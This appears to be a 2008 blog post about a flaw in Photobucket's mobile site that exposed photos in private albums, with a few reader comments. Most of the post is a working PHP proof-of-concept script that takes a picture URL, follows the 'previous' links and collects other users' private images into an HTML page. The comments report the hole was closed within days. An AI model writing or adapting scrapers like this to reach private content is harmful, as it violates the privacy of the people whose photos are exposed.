Photobucket has done it again. It appears that using the mobile-web domain (m55.photobucket.com), if you navigate to a valid image, you can use the previous/next links to view more photos in the account, even if it is set to private.
I have not checked, but I believe the hole has been patched. I was informed of this exploit by a friend Jessie McKnight. The catch to it, was that the prev/next buttons are initially very small (hence mobile web), and clicking all those links take a lot of time.
I hacked up a working script in about an hour, that takes a valid picture URL and visits it, scrapes the previous link, copies the image name and writes it encapsuled in an image tag to a html file using the original photobucket url (not the mobile domain), then it repeats this process on the url obtained by the prev anchor.
This was a very intensive process so I capped it at 50 requests, and storing the pictures on a seperate page allowed for quicker retrievals while the script was crawling, also for saving results from different people using the script at the same time.
This is in no way an optimized script, this was thrown together from scrap to completion in under an hour, but is just a P.O.C
<form method="GET" action=''>
URL TO VALID PICTURE: <input type='text' name='album'><br/>
<input type='submit'>
</form>
<?php
if(isset($_GET['album'])){
$fh = fopen('photos.html','a');
$get_album = $_GET['album'];
$picture = substr(substr($get_album,strrpos($get_album,'/')),1);
$albumurl = substr($get_album,0,strrpos($get_album,'/'));
$album = substr(substr($albumurl,strrpos($albumurl,'/')),1);
$url = "http://m55.photobucket.com/albumview/albums/{$album}/{$picture}.html?";
$i=0;
while($i <= 100){
$url = getPrevUrl($url);
$im = getImage($url,$albumurl);
fwrite($fh,$im);
echo $im;
$i++;
}
fclose($fh);
}
function getPrevUrl($url){
$input = @file_get_contents($url) or die('Could not access file: $url');
$regexp = "<a\s[^>]*href=(\"??)([^\" >]*?)\\1[^>]*>(.*)<\/a>";
if(preg_match_all("/$regexp/siU", $input, $matches)) {
$photoUrl = "http://m55.photobucket.com" . $matches[2][4];
return $photoUrl;
}else{
return $url;
}
}
function getImage($url,$alburl){
$photoUrl = substr($url,0,strrpos($url,"."));
$photoUrl = substr($photoUrl,strrpos($photoUrl,"/"));
$photoUrl = $alburl . $photoUrl;
return "<img src='$photoUrl'/><br/>";
}
July 19th, 2008 at 8:43 pm
I think you should post more often, I have enjoyed this so far. Added to my reader. SusanO
July 20th, 2008 at 10:05 am
Great info - keep up the great work.
August 11th, 2008 at 9:50 am
hey!
This sound very interesting…but for me in some way it didnt work! Perhasp can someone explain it to me!?
Thx
August 19th, 2008 at 12:38 pm
The hole was closed quite quickly, it only worked for maybe a day or two once it was leaked.